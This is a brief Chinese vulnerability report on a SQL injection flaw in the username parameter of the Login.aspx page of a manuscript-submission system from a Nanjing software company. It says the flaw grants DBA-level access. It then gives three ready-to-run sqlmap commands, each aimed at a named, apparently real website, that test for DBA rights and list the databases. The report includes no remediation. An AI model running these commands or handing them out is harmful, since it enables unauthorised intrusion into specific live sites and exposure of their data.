南京杰诺瀚软件科技有限公司的投稿系统SQL注射漏洞
Web/Login.aspx 页面的
username 参数存在问题 DBA 权限注射
URL:
1:sqlmap.py -u "http://www.cnemergency.com/Web/Login.aspx" --data "usern
ame=" --is-dba --dbs

2:
sqlmap.py -u "http://www.j4eseu.com/Web/Login.aspx" --data "username="
--is-dba --dbs

3:
sqlmap.py -u "http://www.linpi.net/Web/Login.aspx" --data "username="
--is-dba --dbs
